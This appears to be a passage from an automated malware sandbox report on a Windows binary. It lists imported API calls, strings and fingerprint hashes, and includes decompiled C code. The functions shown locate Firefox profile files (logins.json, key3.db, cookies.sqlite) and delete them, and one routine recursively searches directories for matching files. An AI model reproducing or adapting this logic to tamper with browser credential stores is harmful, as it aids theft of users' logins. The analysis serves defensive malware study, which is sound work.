                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Function_0001B310,?), ref: 00410730
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Function_0001B310,?), ref: 00410740
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,Function_0001B310,?), ref: 00410750
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_0001B310), ref: 0041075A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                        • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                        • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                        • String ID:
                                        • API String ID: 2968164691-0
                                        • Opcode ID: 5853c421a435e19894150a3264cd99b1a7bd38c59d92ad40cce819792ed43f29
                                        • Instruction ID: 811b7e3e4f446b35303200f11341a1ba311440e0dd0279f7ab7bb97a8af00616
                                        • Opcode Fuzzy Hash: 5853c421a435e19894150a3264cd99b1a7bd38c59d92ad40cce819792ed43f29
                                        • Instruction Fuzzy Hash: C3B11D72D0050DEBCB04EBA0EC59EEEB77CAF54345F148066F516A30A1EB745A89CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040728F, Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 206fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 004072A1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                        • getenv.MSVCRT ref: 004072D9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                        • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                          • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                          • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$D@1@@V10@$V01@@$??4?$basic_string@FileFindV01@$?c_str@?$basic_string@$CloseDeleteFirstNextV10@@getenv
                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                        • API String ID: 3375041920-3681987949
                                        • Opcode ID: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                        • Instruction ID: c62cee961eeb0feb44b1f04b02d1ffc3ba69f98c32627a35338bed2311f0f042
                                        • Opcode Fuzzy Hash: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                        • Instruction Fuzzy Hash: 69712E71C0460EEBCB009BE0DC59DEEBF78AF55355F004176E812E31A0EB74668ACB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040751B, Relevance: 61.4, APIs: 30, Strings: 5, Instructions: 190fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 0040752D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                        • getenv.MSVCRT ref: 00407558
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                        • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                        • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                          • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                          • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 2907366228-432212279
                                        • Opcode ID: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                        • Instruction ID: 2cb50fe65e7b882f74eabaaae12ed0bec9aebdba7c4873397d04c6de05a2bb48
                                        • Opcode Fuzzy Hash: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                        • Instruction Fuzzy Hash: 0C61A431C0460DEBCB00AFB4DC599EEBB78EF55355F004572E812E3290EB75668ACB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404C0A, Relevance: 60.2, APIs: 40, Instructions: 202fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
				char _v5;
				void* _v12;
				char _v13;
				char _v14;
				void* _v32;
				char _v48;
				short _v64;
				char _v80;
				char _v96;
				void* _v112;
				char _v128;
				char _v144;
				struct _WIN32_FIND_DATAW _v736;
				char* _t73;
				struct _WIN32_FIND_DATAW* _t75;
				void* _t79;
				void* _t81;
				signed int _t96;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				signed int _t145;

				_t137 = __ecx;
				_t60 =  &_v5;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
				L00414146();
				_t141 = _t139 + 0x1c;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
				_v12 = FindFirstFileW( &_v64,  &_v64);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v12 == 0xffffffff) {
					L11:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 1;
				}
				while(FindNextFileW(_v12,  &_v736) != 0) {
					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
						L0041414C();
						L00414152();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						_t141 = _t141 + 0x18;
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					}
					_t71 =  &(_v736.cFileName);
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
					_t141 = _t141 + 0x10;
					_t73 =  &_a20;
					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						L8:
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						continue;
					} else {
						_t75 =  &_v736;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						_t145 = _t141 - 0x10;
						_t96 = _t145;
						_t79 = E00412855( &_v80,  &_v128,  &_a4);
						_t80 =  &_v96;
						L00414140();
						L00414140();
						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79,  &E0041B310);
						_t141 = _t145 + 0x30;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							return 0;
						}
						goto L8;
					}
				}
				FindClose(_v12);
				goto L11;
			}

























                                        0x00404c16
                                        0x00404c18
                                        0x00404c1f
                                        0x00404c2f
                                        0x00404c39
                                        0x00404c43
                                        0x00404c4a
                                        0x00404c66
                                        0x00404c6b
                                        0x00404c70
                                        0x00404c80
                                        0x00404c83
                                        0x00404c8d
                                        0x00404e83
                                        0x00404e86
                                        0x00404e8f
                                        0x00404e98
                                        0x00000000
                                        0x00404e9e
                                        0x00404c93
                                        0x00404cb2
                                        0x00404cfa
                                        0x00404d0c
                                        0x00404d19
                                        0x00404d27
                                        0x00404d30
                                        0x00404d3f
                                        0x00404d45
                                        0x00404d4e
                                        0x00404d56
                                        0x00404d5e
                                        0x00404d5e
                                        0x00404d6b
                                        0x00404d72
                                        0x00404d7c
                                        0x00404d86
                                        0x00404d90
                                        0x00404d97
                                        0x00404d9c
                                        0x00404d9f
                                        0x00404da8
                                        0x00404db6
                                        0x00404e44
                                        0x00404e47
                                        0x00000000
                                        0x00404dbc
                                        0x00404dc3
                                        0x00404dcf
                                        0x00404dd9
                                        0x00404de2
                                        0x00404ded
                                        0x00404df0
                                        0x00404e00
                                        0x00404e08
                                        0x00404e0c
                                        0x00404e16
                                        0x00404e20
                                        0x00404e25
                                        0x00404e31
                                        0x00404e3a
                                        0x00404e42
                                        0x00404e55
                                        0x00404e5e
                                        0x00404e67
                                        0x00404e70
                                        0x00000000
                                        0x00404e76
                                        0x00000000
                                        0x00404e42
                                        0x00404db6
                                        0x00404e7d
                                        0x00000000

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                        • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                        • wcscmp.MSVCRT ref: 00404CCA
                                        • wcscmp.MSVCRT ref: 00404CE2
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
